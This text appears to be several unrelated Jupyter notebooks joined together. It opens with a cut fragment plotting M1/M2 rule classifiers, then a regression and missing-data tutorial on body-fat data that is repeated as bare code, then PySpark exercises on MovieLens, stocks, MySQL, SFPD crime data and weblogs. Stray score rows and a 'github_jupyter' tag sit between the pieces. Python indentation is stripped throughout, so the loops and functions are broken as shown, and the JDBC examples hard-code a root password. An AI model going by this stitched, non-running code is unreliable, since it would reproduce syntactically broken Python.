plt.xlabel('Estimated Budget (1000$)')
plt.ylabel('A-List Celebrities')
clfm1 = M1Algorithm(rules, transactionDB).build()
fig, ax = plt.subplots(figsize=(40, 24))
for idx, r in enumerate(clfm1.rules):
plt.subplot(3, 4, idx + 1)
for rule in clfm1.rules[:idx+1]:
plot_rule(rule, plt)
#plot_rule(r, plt)
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("Krok {}".format(idx + 1), fontsize=40)
plt.savefig("../data/m1_rules.png")
len(clfm1.rules)
m2 = M2Algorithm(rules, transactionDB)
clfm2 = m2.build()
fig, ax = plt.subplots(figsize=(40, 16))
for idx, r in enumerate(clfm2.rules):
plt.subplot(2, 5, idx + 1)
for rule in clfm2.rules[:idx+1]:
plot_rule(rule, plt)
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("Krok {}".format(idx + 1), fontsize=40)
plt.savefig("../data/m2_rules.png")
len(clfm2.rules)
clfm2.inspect().to_csv("../data/rulesframe.csv")
import sklearn.metrics as skmetrics
m1pred = clfm1.predict_all(transactionDB)
m2pred = clfm2.predict_all(transactionDB)
actual = transactionDB.classes
m1acc = skmetrics.accuracy_score(m1pred, actual)
m2acc = skmetrics.accuracy_score(m2pred, actual)
print("m1 acc", m1acc)
print("m2 acc", m2acc)
clfm1.rules == clfm2.rules
```
print("m1 acc", m1acc)
print("m2 acc", m2acc)
clfm1.rules == clfm2.rules
| 0.173638 | 0.355243 |
## Missing Data Examples
In this notebook we will look at the effects missing data can have on the conclusions you can draw from a dataset. We will also go over some practical implementations of linear regression in Python.
```
# Includes and Standard Magic...
### Standard Magic and startup initializers.
# Load Numpy
import numpy as np
# Load MatPlotLib
import matplotlib
import matplotlib.pyplot as plt
# Load Pandas
import pandas as pd
# Load SQLITE
import sqlite3
# Load Stats
from scipy import stats
# This lets us show plots inline and also save PDF plots if we want them
%matplotlib inline
from matplotlib.backends.backend_pdf import PdfPages
matplotlib.style.use('fivethirtyeight')
# These two things are for Pandas, it widens the notebook and lets us display data easily.
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:95% !important; }</style>"))
# Show a ludicrous number of rows and columns
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
```
For this work we will be using data from "Generalized body composition prediction equation for men using simple measurement techniques", K.W. Penrose, A.G. Nelson, A.G. Fisher, FACSM, Human Performance Research Center, Brigham Young University, Provo, Utah 84602, as listed in Medicine and Science in Sports and Exercise, vol. 17, no. 2, April 1985, p. 189.
[Data available here.](http://staff.pubhealth.ku.dk/~tag/Teaching/share/data/Bodyfat.html)
```
# Load the Penrose Data
df_penrose = pd.read_csv("./data/bodyfat.csv")
display(df_penrose.head())
# observations = ['Neck', 'Chest', 'Abdomen', 'Hip', 'Thigh', 'Knee', 'Ankle', 'Biceps', 'Forearm', 'Wrist']
observations = ['Age', 'Neck', 'Forearm', 'Wrist']
len(df_penrose)
```
Let's do some basic scatter plots first to see what's going on.
```
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
```
Let's say we want to look at some linear regressions of single variables to see what is going on! So let's plot some regression lines. Note that there are at least a few different ways -- [linregress](https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.linregress.html), [polyfit](https://docs.scipy.org/doc/numpy/reference/generated/numpy.polyfit.html), and [statsmodels](https://www.statsmodels.org/stable/index.html).
Here's a good article about it [Data science with Python: 8 ways to do linear regression and measure their speed](https://www.freecodecamp.org/news/data-science-with-python-8-ways-to-do-linear-regression-and-measure-their-speed-b5577d75f8b/).
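As a quick reminder of what these single-variable fits compute: `linregress` and a degree-1 `polyfit` both solve the ordinary least-squares problem, whose closed-form solution for one predictor is

$$\hat{\beta}_1 = \frac{\sum_i (x_i - \bar{x})(y_i - \bar{y})}{\sum_i (x_i - \bar{x})^2}, \qquad \hat{\beta}_0 = \bar{y} - \hat{\beta}_1\,\bar{x},$$

giving the fitted line $\hat{y} = \hat{\beta}_0 + \hat{\beta}_1 x$.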
```
# Let's do a basic Linear Regression on a Single Variable.
# Note that the linregress p-value tests the null hypothesis that the slope is 0
# (for a single predictor this is equivalent to testing that the correlation is 0).
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_penrose[o],df_penrose['bodyfat'])
line = slope * df_penrose[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_penrose.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 1)
line = x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x2, x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 2)
line = x2 * df_penrose[o]**2 + x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
```
What happens if we start to remove parts of the data -- is the relationship still as strong?
We can use the [pandas sample command](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.sample.html) to remove some of the dataframe.
```
# Let's do a basic Linear Regression on a Single Variable.
# Note that the linregress p-value tests the null hypothesis that the slope = 0.
df_test = df_penrose.sample(frac=0.30, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
line = slope * df_test[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_test.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_test[o], line, lw=1, ls='--', color='red')
```
If we want to determine if these correlations are significant under the missing data then we need to run bootstrap samples and see what happens.
```
results = {o:[] for o in observations}
for i,o in enumerate(observations):
for t in range(500):
df_test = df_penrose.sample(frac=0.30, replace=False)
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
#r,p = stats.pearsonr(df_test[o], df_test['bodyfat'])
results[o].append(p_value)
rs = pd.DataFrame(results)
ax = rs.boxplot()
ax.set_ylim([-0.01,0.17])
ax.axhline(y=0.05, lw=2, color='red')
plt.show()
```
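Note that the loop above draws 30% subsamples *without* replacement, which is really a subsampling check rather than a classical bootstrap. A minimal bootstrap sketch, reusing the objects defined above and resampling the full dataset *with* replacement (the 500-replicate count is just illustrative):
```
# Bootstrap the slope estimate: resample all rows WITH replacement each time.
boot_slopes = {o: [] for o in observations}
for o in observations:
    for _ in range(500):
        df_boot = df_penrose.sample(frac=1.0, replace=True)
        slope, intercept, r_value, p_value, std_err = stats.linregress(df_boot[o], df_boot['bodyfat'])
        boot_slopes[o].append(slope)
pd.DataFrame(boot_slopes).boxplot()
plt.show()
```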
## A More Complicated example with Statsmodels.
Statsmodels (you'll likely need to install it) gives a much more R-like interface to linear modeling. You can read [more about it here](https://www.statsmodels.org/stable/index.html).
```
import statsmodels.api as sm
df_ind = df_penrose[['Neck', 'Wrist']]
df_target = df_penrose['bodyfat']
X = df_ind
y = df_target
# Note the difference in argument order
# Call: endog, then exog (dependent, then independent)
model = sm.OLS(y, X).fit()
predictions = model.predict(X) # make the predictions by the model
# Print out the statistics
model.summary()
#fig, ax = plt.subplots(figsize=(12,8))
#fig = sm.graphics.plot_partregress(endog="bodyfat", exog_i=['Abdomen', 'Neck'], exog_others='', data=df_penrose)
```
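One caveat with the model above: unlike `linregress`, `sm.OLS` does not add an intercept automatically, so the fit is forced through the origin. A minimal sketch of refitting with an intercept, assuming the `X` and `y` defined above:
```
# Add an explicit intercept (a column of ones) to the design matrix and refit.
X_const = sm.add_constant(X)
model_const = sm.OLS(y, X_const).fit()
model_const.summary()
```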
We can also use the [single regressor plot](https://tedboy.github.io/statsmodels_doc/generated/statsmodels.graphics.api.plot_partregress.html#statsmodels.graphics.api.plot_partregress).
```
from statsmodels.graphics.regressionplots import plot_partregress
fig, ax = plt.subplots(figsize=(12,8))
plot_partregress(endog='bodyfat', exog_i='Neck', exog_others='', data=df_penrose, ax=ax)
plt.show()
```
If we have multiple elements in our regression then we need to use a different plot.
```
# Multiple regression plot
from statsmodels.graphics.regressionplots import plot_partregress_grid
fig = plt.figure(figsize=(8, 6))
plot_partregress_grid(model, fig=fig)
plt.show()
```
Another way to work with regressions and their plots is using the [Seaborn Regression Package](https://seaborn.pydata.org/tutorial/regression.html)
```
# Another way to do simple exploratory plots
import seaborn as sns
df_test = df_penrose.sample(frac=0.10, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
sns.regplot(x=o, y='bodyfat', data=df_test, ax=ax[i])
#g.axes.set_xlim(df_test[o].min()*.95,df_test[o].max()*1.05)
```
Another nice simulator to play with is [this one](https://ndirienzo.shinyapps.io/linear_regression_sim/), from [Prof. Nicholas DiRienzo](https://ischool.arizona.edu/people/nicholas-dirienzo) of the University of Arizona's School of Information.
|
github_jupyter
|
# Includes and Standard Magic...
### Standard Magic and startup initializers.
# Load Numpy
import numpy as np
# Load MatPlotLib
import matplotlib
import matplotlib.pyplot as plt
# Load Pandas
import pandas as pd
# Load SQLITE
import sqlite3
# Load Stats
from scipy import stats
# This lets us show plots inline and also save PDF plots if we want them
%matplotlib inline
from matplotlib.backends.backend_pdf import PdfPages
matplotlib.style.use('fivethirtyeight')
# These two things are for Pandas, it widens the notebook and lets us display data easily.
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:95% !important; }</style>"))
# Show a ludicrous number of rows and columns
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
# Load the Penrose Data
df_penrose = pd.read_csv("./data/bodyfat.csv")
display(df_penrose.head())
# observations = ['Neck', 'Chest', 'Abdomen', 'Hip', 'Thigh', 'Knee', 'Ankle', 'Biceps', 'Forearm', 'Wrist']
observations = ['Age', 'Neck', 'Forearm', 'Wrist']
len(df_penrose)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
# Let's do a basic Linear Regression on a Single Variable.
# Note that the linregress p-value tests the null hypothesis that the slope is 0
# (for a single predictor this is equivalent to testing that the correlation is 0).
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_penrose[o],df_penrose['bodyfat'])
line = slope * df_penrose[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_penrose.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 1)
line = x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x2, x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 2)
line = x2 * df_penrose[o]**2 + x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's do a basic Linear Regression on a Single Variable.
# Note that the linregress p-value tests the null hypothesis that the slope = 0.
df_test = df_penrose.sample(frac=0.30, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
line = slope * df_test[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_test.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_test[o], line, lw=1, ls='--', color='red')
results = {o:[] for o in observations}
for i,o in enumerate(observations):
for t in range(500):
df_test = df_penrose.sample(frac=0.30, replace=False)
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
#r,p = stats.pearsonr(df_test[o], df_test['bodyfat'])
results[o].append(p_value)
rs = pd.DataFrame(results)
ax = rs.boxplot()
ax.set_ylim([-0.01,0.17])
ax.axhline(y=0.05, lw=2, color='red')
plt.show()
import statsmodels.api as sm
df_ind = df_penrose[['Neck', 'Wrist']]
df_target = df_penrose['bodyfat']
X = df_ind
y = df_target
# Note the difference in argument order
# Call: endog, then exog (dependent, then independent)
model = sm.OLS(y, X).fit()
predictions = model.predict(X) # make the predictions by the model
# Print out the statistics
model.summary()
#fig, ax = plt.subplots(figsize=(12,8))
#fig = sm.graphics.plot_partregress(endog="bodyfat", exog_i=['Abdomen', 'Neck'], exog_others='', data=df_penrose)
from statsmodels.graphics.regressionplots import plot_partregress
fig, ax = plt.subplots(figsize=(12,8))
plot_partregress(endog='bodyfat', exog_i='Neck', exog_others='', data=df_penrose, ax=ax)
plt.show()
# Multiple regression plot
from statsmodels.graphics.regressionplots import plot_partregress_grid
fig = plt.figure(figsize=(8, 6))
plot_partregress_grid(model, fig=fig)
plt.show()
# Another way to do simple exploratory plots
import seaborn as sns
df_test = df_penrose.sample(frac=0.10, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
sns.regplot(x=o, y='bodyfat', data=df_test, ax=ax[i])
#g.axes.set_xlim(df_test[o].min()*.95,df_test[o].max()*1.05)
| 0.79162 | 0.952882 |
# Processing data using Spark Dataframe with Pyspark
Check the Spark version. If you get an error, you will need to troubleshoot your Spark setup before continuing.
```
spark.version
```
### Exercise 1: use movielens dataset for the following exercise
1. Load movies.csv as movies dataframe. Cache the dataframe
2. Load ratings.csv as ratings dataframe. Cache the dataframe
3. Find the number of records in movies dataframe
4. Find the number of records in ratings dataframe
5. Validate that the userId and movieId combination is unique
6. Find average rating and count of rating per movieId using ratings dataframe
7. Find top 10 movies based on the highest average ratings. Consider only those movies that have at least 100 ratings. Show movieId, title, average rating and rating count columns.
8. Show temporary views for current Spark session
9. Register the movies dataframe and the ratings dataframe as the movies and ratings temporary views respectively. Verify that you can see the new temporary views you just created.
10. Using SQL statement, solve the problem statement for step #7. Match the results from step #7.
Load Spark SQL functions, for example: count, avg, explode etc.
```
from pyspark.sql.functions import *
```
Location of the movies dataset. You can download the dataset from the MovieLens website; here we are using the latest-small dataset.
```
home_dir = "/user/cloudera/movielens/"
```
Create a dataframe on movies.csv file
```
movies = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "movies.csv")
.cache()) # Keep the dataframe in memory for faster processing
```
Show schema of movies dataframe
```
movies.printSchema()
movies.dtypes
```
Display a few sample view from movies Dataframe
```
movies.show(5)
```
Find the number of records in movies dataframe
```
movies.count()
```
Create ratings Dataframe using ratings.csv file
```
ratings = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "ratings.csv")
.persist())
```
Print schema of ratings Dataframe
```
ratings.printSchema()
```
Show a few sample values from ratings dataframe
```
ratings.show(5)
```
Find the number of records in ratings
```
ratings.count()
```
Validate that the movieId and userId combination is a unique identifier in the ratings table
```
ratings.groupBy("movieId", "userId").count().filter("count != 1").show()
```
This shows that there is no userId and movieId combination that occurs more than once.
Find average rating of each movie for which there are at least 100 ratings. Order the result by average rating in decreasing order.
```
ratings_agg = (ratings
.groupBy(col("movieId"))
.agg(
count(col("movieId")).alias("count"),
avg(col("rating")).alias("avg_rating")
))
ratings_agg.show()
(ratings_agg
.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.filter("count > 100")
.orderBy(desc("avg_rating"))
.select("t1.movieId", "title", "avg_rating", "count")
.limit(10)
.show())
```
Show temporary views for current Spark session
```
sql("show tables").show()
movies.createOrReplaceTempView("movies")
ratings.createOrReplaceTempView("ratings")
sql("show tables").show()
```
Using SQL statement, find top 10 movies based on the highest average ratings. Consider only those movies that have at least 100 ratings. Show movieId, title, average rating and rating count columns.
```
sql("""
select
t1.movieId,
t1.title,
avg(t2.rating) avg_rating,
count(1) rating_count
from movies t1 join ratings t2 on t1.movieId = t2.movieId
group by t1.movieId, t1.title
having rating_count >= 100
order by avg_rating desc
limit 10
""").show()
```
# Find average rating of each genre (advanced)
```
genre_avg_rating = (ratings.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.select(col("rating"), explode(split("genres", r"\|")).alias("genre"))
.groupBy(col("genre"))
.agg(count(col("genre")).alias("count"), avg("rating").alias("avg_rating"))
.orderBy(desc("avg_rating")))
genre_avg_rating.show()
```
### Using matplotlib show barplot of average rating for each genre (Optional)
Loading matplotlib library
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
```
Convert spark dataframe to Pandas Dataframe.
```
df = genre_avg_rating.toPandas()
df.head()
```
Plot average rating for each genre
```
df.plot("genre", "avg_rating", "bar", title = "Barplot of avg rating by genre")
```
### Exercise 2: Use stocks.csv for the following exercise
1. Load stocks.csv as the stocks dataframe with schema inference enabled. Cache the dataframe.
2. What are the data types of each column?
3. Cast the date field of the stocks dataframe to date type.
4. What is the largest value in the date column? You should get 2016-08-15.
5. Register the stocks dataframe as the stocks temporary view.
6. Create a new dataframe, stocks_last10, with the last 10 records for each stock. Select the date, symbol and adjclose columns. You can use a SQL statement with a SQL window operation. [Hint: if you are not familiar with window operations in SQL, please refer to this - https://databricks.com/blog/2015/07/15/introducing-window-functions-in-spark-sql.html]
7. Create a new dataframe, stocks_pivot, by pivoting the stocks_last10 dataframe.
8. Find the difference in adjclose between each pair of consecutive days.
```
stocks = (spark
.read
.format("csv")
.options(inferSchema = True, header = True)
.load("stocks")
.cache())
stocks.show()
stocks.printSchema()
stocks.withColumn("date", col("date").cast("date")).printSchema()
stocks = stocks.withColumn("date", col("date").cast("date"))
stocks.show()
stocks.orderBy(col("date").desc()).show(1)
stocks.createOrReplaceTempView("stocks")
stocks_last10 = sql("""
select
cast(t1.date as string),
t1.symbol,
t1.adjclose,
t1.row_num
from (select
*,
row_number() over (partition by symbol order by date desc) row_num
from stocks) t1 where t1.row_num <= 11
""")
stocks_last10.show()
stocks_pivot = stocks_last10.groupby("symbol").pivot("date").agg(max(col("adjclose")))
stocks_pivot.limit(10).toPandas()
columns = ["v" + str(i) for i in range(len(stocks_pivot.columns) - 1)]
columns.insert(0, "symbol")
columns
stocks_pivot = stocks_pivot.toDF(*columns)
stocks_pivot.limit(10).toPandas()
stocks_diff = stocks_pivot
for i in range(1, len(stocks_diff.columns) - 1):
stocks_diff = stocks_diff.withColumn(columns[i], col(columns[i]) - col(columns[i+1]))
stocks_diff = stocks_diff.drop(stocks_diff.columns[-1])
stocks_diff.limit(10).toPandas()
```
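An alternative to the pivot-and-subtract approach for step 8 is a window function: `lag` over a per-symbol window ordered by date gives the previous day's adjclose directly. A sketch, assuming the stocks dataframe defined above:
```
from pyspark.sql.window import Window
from pyspark.sql.functions import lag, col

# Day-over-day change in adjclose, computed with a window instead of a pivot.
w = Window.partitionBy("symbol").orderBy("date")
stocks_diff_w = (stocks
    .withColumn("prev_adjclose", lag("adjclose", 1).over(w))
    .withColumn("adjclose_diff", col("adjclose") - col("prev_adjclose")))
stocks_diff_w.select("symbol", "date", "adjclose", "adjclose_diff").show(10)
```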
### Exercise 3: Read data from mysql
1. Create a dataframe - orders in Spark based on orders table in retail_db in mysql
2. Save the orders as parquet file in HDFS
3. Write a query joining the customers table in mysql and the orders parquet file in HDFS to find the customers with the most completed orders.
4. Save the orders dataframe as a hive table. Verify that the orders table is accessible in hive as well.
5. Delete the orders table from hive.
Create a dataframe - orders in Spark based on orders table in retail_db in mysql
```
orders = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "orders")
.option("user", "root")
.option("password", "cloudera")
.load())
orders.show()
```
Save the orders as parquet file in HDFS
```
orders.write.format("parquet").mode("overwrite").save("orders")
```
Create a dataframe customers, based on the customers table in retail_db in mysql database.
```
customers = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "customers")
.option("user", "root")
.option("password", "cloudera")
.load())
customers.show(5)
```
Create an orders dataframe based on the orders parquet file.
```
orders = spark.read.load("orders")
orders.show(6)
```
Write a query joining the customers table in mysql and the orders parquet file in HDFS to find the customers with the most completed orders.
```
(orders.alias("t1")
.join(customers.alias("t2"), col("t1.order_customer_id") == col("t2.customer_id"))
.filter("t1.order_status == 'COMPLETE'")
.groupby("order_customer_id", "customer_fname", "customer_lname")
.count()
.orderBy(col("count").desc())
.show(10))
orders.write.mode("overwrite").saveAsTable("orders")
```
Verify the table in Hive. See whether the orders table shows up as a permanent table. You can use the describe formatted <table> command to see what type of Hive table it is.
```
sql("show tables").show()
spark.table("orders").show(10)
sql("describe formatted orders").toPandas()
```
Drop the table from hive
```
sql("drop table orders").show()
```
### Exercise 4: Use SFPD (San Francisco Police Department) Dataset for the following tasks
Filename: Crime_Incidents.csv.gz. Create a directory called sfpd in your home path in the file system and put this file into it.
Tasks:
1. Create a dataframe with the crime incident data.
2. Show the first 10 values of the dataframe.
3. Check the number of partitions of the dataframe.
4. Find the number of incident records in the dataframe.
5. Find the categories of incidents.
6. Find the total number of categories.
7. Find the total number of incidents in each category.
8. Find out on which day each type of incident has occurred most often.
9. [Optional] Plot the frequency of each category of events.
10. Create a UDF to parse the date field and convert it into a date-type field.
```
sfpd = (spark
.read
.format("csv")
.option("header", True)
.option("inferSchema", True)
.load("sfpd")
)
sfpd.printSchema()
sfpd.limit(5).toPandas() # Using a pandas dataframe only for better tabular display
sfpd.rdd.getNumPartitions()
type(sfpd.first())
categories = sfpd.select("Category").distinct().rdd.map(lambda r: r.Category)
print(categories.collect())
categories_count = categories.count()
categories_count
category_counts = sfpd.groupBy("Category").count().orderBy(col("count").desc())
category_counts.show(categories_count, False)
category_counts.toPandas().set_index("Category").plot.barh(figsize = (10, 15))
sfpd.select("date").show(10, False)
from datetime import datetime
s = "04/20/2005 12:00:00 AM"
d = datetime.strptime(s[:10], "%m/%d/%Y").date()
d
from datetime import datetime
def parse_date(s):
return datetime.strptime(s[:10], "%m/%d/%Y").date()
parse_date("04/20/2005 12:00:00 AM")
from pyspark.sql.types import DateType
spark.udf.register("parse_date", parse_date, DateType())
sfpd.select(expr("date"), expr("parse_date(`date`)")).show(10, False)
sfpd_clean = sfpd.withColumn("date", expr("parse_date(date)"))
sfpd_clean.limit(10).toPandas()
```
# Caveat
In the above example you used a UDF written in Python. Python UDFs make dataframe operations run significantly more slowly than UDFs written in Scala or Java, so it is generally safer to use built-in functions or to invoke UDFs written in Scala or Java. For the above exercise there is already a built-in function called to_timestamp. Find out the details in the Spark API doc.
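For example, the same parsing can be done with the built-in function instead of a Python UDF; the format string below is an assumption based on the sample value `04/20/2005 12:00:00 AM`:
```
from pyspark.sql.functions import to_timestamp, to_date, col

# Built-in parsing: the work stays in the JVM, no Python UDF round-trip.
sfpd_builtin = sfpd.withColumn("date_builtin", to_date(to_timestamp(col("date"), "MM/dd/yyyy hh:mm:ss a")))
sfpd_builtin.select("date", "date_builtin").show(5, False)
```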
### Exercise 5: This exercise explores data partitioning for files. Data partitions are different from RDD partitions. For this exercise use the weblogs dataset.
1. Create a hive table - weblogs - using the weblogs dataset. Follow the steps mentioned in this doc: http://blog.einext.com/hadoop/hive-table-using-regex-serde
2. Create a dataframe in Spark that refers to the Hive table weblogs.
3. Find the total number of rows.
4. Parse the time column as a datetime.
5. Save the weblogs data partitioned by year and month, based on the time field that you parsed in step #4.
6. Reload the partitioned dataset and verify that the number of records matches the original.
You can upload the weblogs dataset to HDFS and create a hive table by running the following hive table create command.
```
CREATE EXTERNAL TABLE `weblogs`(
`host` string COMMENT 'Host',
`identity` string COMMENT 'User Identity',
`user` string COMMENT 'User identifier',
`time` string COMMENT 'Date time of access',
`request` string COMMENT 'Http request',
`status` string COMMENT 'Http status',
`size` string COMMENT 'Http response size',
`referrer` string COMMENT 'Referrer url',
`useragent` string COMMENT 'Web client agent')
ROW FORMAT SERDE
'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
'input.regex'='(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})? (\\S+) (\\S+) (\\[.+?\\]) \"(.*?)\" (\\d{3}) (\\S+) \"(.*?)\" \"(.*?)\"',
'output.format.string'='%1$s %2$s %3$s %4$s %5$s %6$s %7$s %8$s %9$s')
STORED AS INPUTFORMAT
'org.apache.hadoop.mapred.TextInputFormat'
OUTPUTFORMAT
'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION
'/user/cloudera/weblogs';
```
Create a dataframe in Spark that refers to Hive table weblogs.
```
sql("show tables").show()
weblogs = spark.table("weblogs")
weblogs.limit(10).toPandas()
```
Find total number of rows.
```
weblogs.count()
```
Parse the time column as date time
```
weblogs_clean = weblogs.withColumn("time_clean", expr(r"from_unixtime(UNIX_TIMESTAMP(TIME, '[dd/MMM/yyyy:HH:mm:ss Z]'))"))
weblogs_clean.select("time", "time_clean").show(10, False)
```
Save the weblogs data partitioned by year and month, based on the time field that you parsed in the previous step.
```
(weblogs_clean
.withColumn("year", expr("year(time_clean)"))
.withColumn("month", expr("month(time_clean)"))
.write
.mode("overwrite")
.partitionBy("year", "month")
.save("weblogs-partitioned"))
```
Reload the partitioned dataset and verify that the number of records matches the original.
```
weblogs_partitioned = spark.read.load("weblogs-partitioned")
weblogs_partitioned.printSchema()
weblogs_partitioned.count()
```
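A side benefit of partitioning is partition pruning: a filter on the partition columns lets Spark scan only the matching directories rather than the whole dataset. A sketch (the year and month values below are just illustrative):
```
# Only the files under the matching year=/month= directories are read.
(spark.read.load("weblogs-partitioned")
      .filter("year = 2014 AND month = 3")
      .count())
```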
### Exercise 6: Convert RDD to Dataframe
There are a couple of ways to convert the RDD into a dataframe:
A. Supply a schema defined using a StructType object
B. Infer the schema
```
from random import random
rdd = sc.parallelize([random() for _ in range(10)])
rdd.collect()
from pyspark.sql import Row
rddRow = rdd.map(lambda f: Row(f))
spark.createDataFrame(rddRow).toDF("col1").show()
rddRow = rdd.map(lambda f: Row(col1 = f))
df = spark.createDataFrame(rddRow)
df.show()
```
#### Supply schema while converting the rdd into a dataframe
By default, Spark will try to infer the column names and types by sampling the RDD of Row objects. To control this process you can supply the schema programmatically as well.
```
# Schema created by schema inferencing
rdd = sc.parallelize([
Row(c1 = 1.0, c2 = None, c3 = None),
Row(c1 = None, c2= "Apple", c3 = None)])
df = spark.createDataFrame(rdd, samplingRatio=1.0) # samplingRatio = 1 forces to see all records
df.printSchema()
```
Now, suppose you already know the schema of the record - it should have three columns, c1, c2 and c3, of float, string and date types respectively.
```
from pyspark.sql.types import *
schema = StructType([
StructField("c1", FloatType()),
StructField("c2", StringType()),
StructField("c3", DateType()),
])
df = spark.createDataFrame(rdd, schema)
df.printSchema()
df.show()
moviesRdd = sc.textFile("movielens/movies.csv")
moviesRdd.take(10)
moviesRdd.filter(lambda line: len(line.split(",")) != 3).take(10)
from io import StringIO
import csv
from pyspark.sql.types import Row
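# parse_movie: run each line through the csv module so that commas inside
# quoted movie titles are kept together, then wrap the tokens in a Row.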
def parse_movie(line):
tokens = [v for v in csv.reader(StringIO(line), delimiter=',')][0]
fields = tuple(tokens)
return Row(*tokens)
moviesCleanRdd = (moviesRdd
.filter(lambda line: not line.startswith("movieId"))
.map(parse_movie)
)
df = moviesCleanRdd.toDF().toDF("movieId", "title", "genre")
df.show(10, False)
schema = StructType([
StructField("movieId", StringType()),
StructField("title", StringType()),
StructField("genres", StringType()),
])
spark.createDataFrame(moviesCleanRdd, schema).show(10, False)
```
# Exercise 7: Data format
Save the stocks.csv dataset in the following formats and compare the sizes on disk:
A. csv
B. Json
C. Parquet
```
stocks = (spark
.read
.option("header", True)
.option("inferSchema", True)
.csv("stocks"))
!hadoop fs -ls -h stocks
(stocks
.write
.format("csv")
.option("compression", "gzip")
.option("header", True)
.save("stocks.csv.gz"))
!hadoop fs -ls -h stocks.csv.gz
```
Save in json format
